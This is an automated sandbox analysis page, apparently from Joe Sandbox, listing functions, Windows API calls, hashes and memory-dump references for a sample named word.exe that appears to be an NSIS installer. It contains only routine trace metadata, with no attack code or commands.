Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_word.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: cd3a49c7226bd267e48e570e062e78a21ab1dc0dccc3f926e80528383bd8a00b
Instruction ID: 946e86dc2be410c0748ecba0c1d48508df540d87c222276c6f0f58241c559a10
Opcode Fuzzy Hash: cd3a49c7226bd267e48e570e062e78a21ab1dc0dccc3f926e80528383bd8a00b
Instruction Fuzzy Hash: C5318B79408205DAFB41DF649CC5BCA37ECFB042D5F018465FA0A9A09ADF78A8458A60

Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30

Strings

!, xrefs: 00401BEC

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
Instruction ID: c8505a4ed1fbcfe48898eca751f608fe424cacc25c72cee6cab93c7adb8e4515
Opcode Fuzzy Hash: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
Instruction Fuzzy Hash: 742190B1A44208BFEF41AFB4CD4AAAE7BB5EF40344F14453EF541B61D1D6B89A40E728

Function 0040303A Relevance: 6.1, APIs: 4, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040304F

Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
WriteFile.KERNELBASE(0040A8A0,00410ACF,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
SetFilePointer.KERNELBASE(00004B8B,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID:
API String ID: 2146148272-0
Opcode ID: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
Instruction ID: 2060b4db2a59e7e801be0a10e6f45457beaa1fbeaf8038f8ae1418eaad325724
Opcode Fuzzy Hash: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
Instruction Fuzzy Hash: 4B414F725052019FDB10BF29EE849663BFCFB4431A715863BE810BA2E4D7389952CB5E

Function 0040586F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE

Part of subcall function 0040581A: CharNextA.USER32(?,?,C:\,?,00405886,C:\,C:\,?,?,77582EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 00405828
Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 0040582D
Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 00405841

lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,77582EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 004058C2
GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,77582EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,77582EE0), ref: 004058D2

Strings

C:\, xrefs: 00405875, 0040587A, 00405880, 004058BB, 004058C1, 004058C9, 004058D1

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: 701659df45ad2e7dc9a8ac17e88d16d16a3f1e089910ceabf1d04e9e8156ac98
Instruction ID: 7f50483e2a8f6f86a99d9ce3f0559f7f2fa95531c727e4579d4e18038bffad21
Opcode Fuzzy Hash: 701659df45ad2e7dc9a8ac17e88d16d16a3f1e089910ceabf1d04e9e8156ac98
Instruction Fuzzy Hash: 06F02823105E112AD626323A1C49AAF0A54CE86364718C13BFC51B32D2CB3C8C23EDBE

Function 004031E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00405F5C: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\word.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FB4
Part of subcall function 00405F5C: CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
Part of subcall function 00405F5C: CharNextA.USER32(?,"C:\Users\user\Desktop\word.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FC6
Part of subcall function 00405F5C: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FD6

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00403204

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004031E4, 004031E9, 004031EF, 004031FB, 00403203, 0040320A
1033, xrefs: 0040320B

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-2414109610
Opcode ID: 19db8b8bfed8fece06fc430a338c59f426dc89455e02ba762a85112f258f8684
Instruction ID: 49f334a6ee715e6e2f1f3bf4cc11e7508e43270cc78003a87510b5ca2b0d9132
Opcode Fuzzy Hash: 19db8b8bfed8fece06fc430a338c59f426dc89455e02ba762a85112f258f8684
Instruction Fuzzy Hash: 4CD0C71154AD3066D55137263D46FCF050C8F46719F514077FD04751C29B6C594365EF

Function 00406700 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
Instruction ID: cc181508766c158152089796d80991778684c5c1c63ccc40f22f1fdcfebbd241
Opcode Fuzzy Hash: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
Instruction Fuzzy Hash: C8A13371E00228CBDF28CFA8C8547ADBBB1FB44305F15816EE816BB281D7785A96DF44

Function 00406901 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
Instruction ID: 3fc28d3a08aea7e3d86c5d24e10e7686d7df8f1296a80a0676572424d41607f7
Opcode Fuzzy Hash: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
Instruction Fuzzy Hash: FF912370E00228CBDF28CF98C8547ADBBB1FB45305F15816ED816BB291D7785A96DF44

Function 00406617 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
Instruction ID: dd30d2edeb09ef8142f3126e4ca7f9bb6d977725bfad211a31da1ac854ab15b9
Opcode Fuzzy Hash: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
Instruction Fuzzy Hash: 29814771E00228CFDF24CFA8C8447ADBBB1FB44305F25816AD416BB281D7389A96DF05

Function 0040611C Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
Instruction ID: 9c7bf14ce72a16f54db54216be52a61449617ebae17e1f3f959b8044aea663dd
Opcode Fuzzy Hash: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
Instruction Fuzzy Hash: 42816771D00228CBDF24CFA8C8447ADBBB1FB44305F11816EE856BB281D7786A96DF45

Function 0040656A Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
Instruction ID: 46e89f5986d2092b55afe70fa6685d9fa399791e8108fb818b391c00f2395523
Opcode Fuzzy Hash: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
Instruction Fuzzy Hash: DB7134B1D00228CFDF24CFA8C9547ADBBB1FB48305F15816AE816BB281D7385A96DF45

Function 00406688 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
Instruction ID: 5e67b4a66f05046138c2ae5a0676b57ce30197662a7df0c6b5261f8fe412ade3
Opcode Fuzzy Hash: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
Instruction Fuzzy Hash: 22713471E00228CBDF28CFA8C854BADBBB1FB44305F15816ED816BB291D7385A96DF45

Function 004065D4 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
Instruction ID: 362732d661397dfbd4d13a455e5b242d3c248a06ae4e9e58d05d54b49be68c20
Opcode Fuzzy Hash: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
Instruction Fuzzy Hash: E7714671E00228CBDF28CF98C854BADBBB1FB44305F15816EE816BB291D7386A56DF45

Function 00402F1F Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
WriteFile.KERNELBASE(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,?,00000004,00000000,00000000,?,?), ref: 00402FD2

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: b34524b006225fd86995ffc18ec7893ffd6bb3b8ae62ae05747d43261111392a
Instruction ID: 299fc1a8812a7dc38163d95f9210b7a7d751e7dd8a0fa05609209fb9265a90e4
Opcode Fuzzy Hash: b34524b006225fd86995ffc18ec7893ffd6bb3b8ae62ae05747d43261111392a
Instruction Fuzzy Hash: B2314871502259EFDF20DF59DE44A9E3BA8EF043A5F20403AF908E61D0D374DA41EBA9

Function 00405BD8 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,00405E1D,00000000,00000002,?,00000002,?,?,00405E1D,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C01
RegQueryValueExA.KERNELBASE(?,?,00000000,00405E1D,?,00405E1D), ref: 00405C22
RegCloseKey.KERNELBASE(?), ref: 00405C43

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction ID: a34a41eefb499e4b528ee0e15ee2ddc390ed289ee56622bd58176e85d3ab8876
Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction Fuzzy Hash: 05015A7114520EEFEB228F64EC45AEB3FACEF15358F004036F944A6220D235D964CBA5

Function 0040243A Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000421,00000000,00000022,00000000,?,?), ref: 00402B2F

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsy9448.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 0bf27dae340eea5e915237078b2308e9c6c5266a737caaa70cede8a9317ecc3d
Instruction ID: 09a8887cd5e4729410dcfabe5c46d2a670465c21522258ca6cdcbf1033b2090e
Opcode Fuzzy Hash: 0bf27dae340eea5e915237078b2308e9c6c5266a737caaa70cede8a9317ecc3d
Instruction Fuzzy Hash: E8F08671904204FFD7119F659D8CEBF7A6CEB40748F10453EF441B62C0D6B95E41966A

Function 100027EC Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 100028AB
GetLastError.KERNEL32 ref: 100029B2

Memory Dump Source

Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
